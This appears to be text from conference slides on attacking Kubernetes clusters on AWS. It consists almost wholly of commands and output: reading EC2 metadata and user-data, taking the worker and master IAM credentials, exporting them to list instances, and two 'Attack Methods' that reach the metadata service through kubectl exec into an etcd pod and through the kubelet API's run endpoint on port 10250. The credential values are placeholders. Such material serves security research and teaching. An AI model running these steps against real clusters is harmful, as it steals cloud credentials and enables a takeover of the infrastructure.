AWS
$ curl -s 169.254.169.254/latest/user-data
#!/bin/bash -xe
...
aws s3 --region $REGION
cp s3://...
...
kubeadm join --token mykubeadmtoken 10.0.0.1:443
EC2 API: Obtain IAM Credentials
$ curl -s 169.254.169.254/latest/meta-data/iam/security-credentials/kubernetes-worker-iam-policy
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MyAccessKeyID",
"SecretAccessKey" : "MySecretAccessKey",
"Token" : "MySessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}
EC2 API: Use IAM Credentials
# Place credentials in ENV vars
$ export AWS_REGION=us-east-1
$ export AWS_ACCESS_KEY_ID=MyAccessKeyID
$ export AWS_SECRET_ACCESS_KEY=MySecretAccessKey
$ export AWS_SESSION_TOKEN=MySessionToken
# Enumerate instances, get all user-data scripts
$ aws ec2 describe-instances
$ aws ec2 describe-instance-attribute --instance-id i-xxxxxxx --attribute userData
Attack Method 2a: "kubectl exec" into a Pod
$ kubectl exec -it etcd-000 curl -s 169.254.169.254/latest/meta-data/iam/securitycredentials/kubernetes-master-iam-policy
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MasterAccessKeyID",
"SecretAccessKey" : "MasterSecretAccessKey",
"Token" : "MasterSessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}
Attack Method 2b: Kubelet API "run cmd"
$ curl -sk https://10.0.0.1:10250/run/kube-system/etcd-000/etcd-server -d “cmd=curl -s 169.254.169.254/latest/meta-data/iam/security-cre dentials/kubernetes-master-iam-policy”
{
"Code" : "Success",
"LastUpdated" : "2017-12-25T00:00:00Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "MasterAccessKeyID",
"SecretAccessKey" : "MasterSecretAccessKey",
"Token" : "MasterSessionToken",
"Expiration" : "2017-12-25T04:00:00Z"
}